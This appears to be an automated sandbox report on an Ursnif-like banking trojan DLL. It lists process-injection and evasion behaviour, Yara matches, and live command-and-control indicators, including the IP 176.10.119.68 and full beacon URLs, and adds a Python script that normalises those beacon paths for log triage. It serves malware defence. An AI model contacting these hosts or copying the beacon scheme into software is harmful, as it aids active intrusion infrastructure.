                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01003365 cpuid 3_2_01003365
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B781F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,3_2_05B781F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01004B89 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,3_2_01004B89
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01006D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_01006D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01003365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_01003365

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Source: Yara matchFile source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques flagged by this report, grouped by tactic column (left to right in the original matrix: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact). The number in parentheses is the signature count exactly as it appears in the flattened matrix; unflagged template cells are omitted.

Initial Access: Valid Accounts (1)
Execution: Windows Management Instrumentation (1); Native API (1); Command and Scripting Interpreter (1)
Persistence: Valid Accounts (1)
Privilege Escalation: Valid Accounts (1); Access Token Manipulation (1); Process Injection (813)
Defense Evasion: Obfuscated Files or Information (1); File Deletion (1); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (31); Process Injection (813); Rundll32 (1)
Credential Access: none flagged
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (25); Query Registry (1); Security Software Discovery (11); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (11); System Network Configuration Discovery (1)
Lateral Movement: none flagged
Collection: Archive Collected Data (11); Email Collection (1)
Exfiltration: none flagged
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Network Effects: none flagged
Remote Service Effects: none flagged
Impact: Data Encrypted for Impact (1)

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 633919  Sample: zs5n5sI6N2  Start date: 25/05/2022  Architecture: WINDOWS  Score: 100

Signatures on the sample itself: Snort IDS alert for network traffic; Found malware configuration; Antivirus detection for URL or domain; 3 other signatures

Process tree (indentation = parent/child; "injects into" = code-injection edge; signatures are listed under the process they fired on):

• zs5n5sI6N2 (start)
  • loaddll32.exe
    • cmd.exe
      • rundll32.exe
        connects to 176.10.119.68:80 (AS-SOFTPLUSCH, Switzerland) from local port 49771
        signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
        • control.exe
          signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
          • injects into explorer.exe
            signatures: Changes memory attributes in foreign processes to executable or writable; Self deletion via cmd delete; Writes to foreign memory regions; 2 other signatures
            • injects into RuntimeBroker.exe
            • cmd.exe
              signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
              • PING.EXE, pings 192.168.2.1
              • conhost.exe
            • cmd.exe
    • WerFault.exe (three instances; loaddll32.exe crash reports)
  • mshta.exe
    • powershell.exe
      signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
      • csc.exe, drops C:\Users\user\AppData\Local\...\rn2v1u0v.dll (PE32)
        • cvtres.exe
      • csc.exe, drops C:\Users\user\AppData\Local\...\0rxpcrxp.dll (PE32)
        • cvtres.exe
      • conhost.exe

Initial Sample
Source | Detection | Scanner | Label
zs5n5sI6N2.dll | 41% | ReversingLabs | Win32.Trojan.Lazy
zs5n5sI6N2.dll | 100% | Joe Sandbox ML | -

Dropped Files
No Antivirus matches

Unpacked PE Files
Source | Detection | Scanner | Label
3.2.rundll32.exe.1000000.0.unpack | 100% | Avira | HEUR/AGEN.1245293

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://176.10.119.68/ | 4% | Virustotal | -
http://176.10.119.68/ | 100% | Avira URL Cloud | phishing
http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZ | 100% | Avira URL Cloud | phishing
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk | 100% | Avira URL Cloud | phishing
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk | 100% | Avira URL Cloud | phishing
http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB | 100% | Avira URL Cloud | phishing
http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco | 100% | Avira URL Cloud | phishing
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
Contacted Domains
No contacted domains info

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk | true | Avira URL Cloud: phishing | unknown
http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk | true | Avira URL Cloud: phishing | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://176.10.119.68/ | rundll32.exe, 00000003.00000003.385741763.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370400985.0000000000F44000.00000004.00000020.00020000.00000000.sdmp | true | 4% Virustotal; Avira URL Cloud: phishing | unknown
http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZ | rundll32.exe, 00000003.00000003.370432738.0000000000F55000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://constitution.org/usdeclar.txt | rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB | rundll32.exe, 00000003.00000002.507870462.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco | rundll32.exe, 00000003.00000002.507972580.0000000000F55000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
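The /drew/... paths in the tables above have the shape public ISFB/Ursnif analyses describe for the loader's beacon: base64 text with '+' and '/' rewritten as _2B and _2F, cut into directory segments, with a throwaway file name at the end. The following is an added example, not part of the report and not the malware's own code. The URL constants are copied from the tables above; the meaning of the tokens and the block-cipher reading of the decoded length come from public ISFB analyses, not from this page, and are flagged as such in the code. It also shows why segments must be joined before the tokens are undone: in the oaRRlHeZ URL the token _2F is split across a slash.

```python
"""Normalise the ISFB/Ursnif-style beacon paths listed in the URL tables.

Added example, not Joe Sandbox output and not the malware's own code. The
URL constants are copied from the report; the meaning of the _2B/_2F tokens
(stand-ins for the base64 characters '+' and '/') and the block-cipher
reading of the decoded length come from public ISFB analyses, not this page.
"""
import base64
import re
from urllib.parse import urlsplit

# Tokens the loader writes instead of '+' and '/' (public ISFB analyses).
SUBSTITUTIONS = (("_2B", "+"), ("_2F", "/"))

# Beacon shape: one fixed directory, then several base64-like segments that
# may carry the underscore tokens, then a short throwaway extension.
BEACON_PATH_RE = re.compile(r"^/[A-Za-z0-9]+(?:/[A-Za-z0-9_]+){3,}\.[A-Za-z0-9]{2,4}$")
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+$")


def looks_like_beacon(url: str) -> bool:
    """Cheap shape test, usable as a proxy-log pre-filter."""
    return BEACON_PATH_RE.match(urlsplit(url).path) is not None


def normalize_path(url: str) -> str:
    """Undo the path mangling and return plain (unpadded) base64 text.

    Segments are joined *before* the tokens are undone: the loader inserts
    '/' into the already-substituted string, so a token can straddle two
    segments (the oaRRlHeZ URL has '_2' at the end of one segment and 'F'
    at the start of the next).
    """
    parts = [p for p in urlsplit(url).path.split("/") if p]
    body = parts[1:]  # parts[0] is the fixed directory ("drew" here)
    if body and "." in body[-1]:
        body[-1] = body[-1].rsplit(".", 1)[0]  # drop the ".jlk" extension
    text = "".join(body)
    for token, char in SUBSTITUTIONS:
        text = text.replace(token, char)
    return text


def decode_payload(url: str):
    """Return the raw (still encrypted) payload bytes, or None if the path
    does not hold valid base64 once normalised."""
    text = normalize_path(url)
    if not _B64_RE.match(text) or len(text) % 4 == 1:
        return None
    try:
        return base64.b64decode(text + "=" * (-len(text) % 4))
    except ValueError:
        return None


def summarize(url: str) -> dict:
    """What a triage script records per URL: shape match, payload length,
    and whether that length fits a 16-byte block cipher (public analyses
    describe Serpent-CBC); a misaligned length usually means a truncated URL."""
    raw = decode_payload(url)
    n = len(raw) if raw is not None else 0
    return {
        "beacon_shape": looks_like_beacon(url),
        "decoded_len": n,
        "block_aligned": n > 0 and n % 16 == 0,
    }


# Copied verbatim from the report's URL tables.
URL_A = "http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk"
URL_B = "http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk"
URL_TRUNCATED = "http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZ"
URL_BENIGN = "http://constitution.org/usdeclar.txt"

if __name__ == "__main__":
    for u in (URL_A, URL_B, URL_TRUNCATED, URL_BENIGN):
        print(urlsplit(u).path[:40], summarize(u))
```

Decoding stops at the ciphertext: the key is part of the malware configuration, which this report does not reproduce, so the script only records the shape match and the decoded length. The two complete URLs decode to 208 and 192 bytes, both multiples of 16, while the truncated oaRRlHeZ URL does not align, which is the check that tells a memory-carved fragment from a full beacon. The shape regex is a pre-filter for proxy logs, not a signature on its own; pair it with the contacted-IP indicator from the tables.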
Contacted Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
176.10.119.68 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true

Private IPs
IP
192.168.2.1
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:633919
Start date and time:2022-05-25 11:25:19 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 14m 51s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:zs5n5sI6N2 (renamed file extension from none to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:42
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@29/29@0/2
                      EGA Information:
                      • Successful, ratio: 75%
                      HDC Information:
                      • Successful, ratio: 22.1% (good quality ratio 20.1%)
                      • Quality average: 78.9%
                      • Quality standard deviation: 31.5%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 146
                      • Number of non-executed functions: 210
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.89.179.12, 13.107.42.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 6732 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
11:26:44 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
11:26:57 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
11:27:42 | API Interceptor | 23x Sleep call for process: powershell.exe modified
IPs
Match | Associated Sample Name / URL | Detection | Context
176.10.119.68 | 628df1368bdb5.dll | malicious | -

Domains
No context

ASNs
Match | Associated Sample Name / URL | Detection | Context
AS-SOFTPLUSCH | 628df1368bdb5.dll | malicious | 176.10.119.68
AS-SOFTPLUSCH | PE ID & DLT TEMPLATE.exe | malicious | 91.192.100.5
AS-SOFTPLUSCH | Payment Slip 01.exe | malicious | 91.192.100.5
AS-SOFTPLUSCH | bank_payment-doc.exe | malicious | 91.192.102.107
AS-SOFTPLUSCH | BJp3aUvrt9.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | 62835e34e60c1.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | 62835e34e60c1.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | P5ASinnD4i.exe | malicious | 176.10.119.117
AS-SOFTPLUSCH | 5A30ie6lsZ.exe | malicious | 176.10.119.117
AS-SOFTPLUSCH | OIpCcXM6Y5.exe | malicious | 176.10.119.117
AS-SOFTPLUSCH | xaj0e933Uv.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | tIJVb0BvkI.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | XoVzWJQAQ0.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | qOfIxt1fnQ.dll | malicious | 185.189.151.28
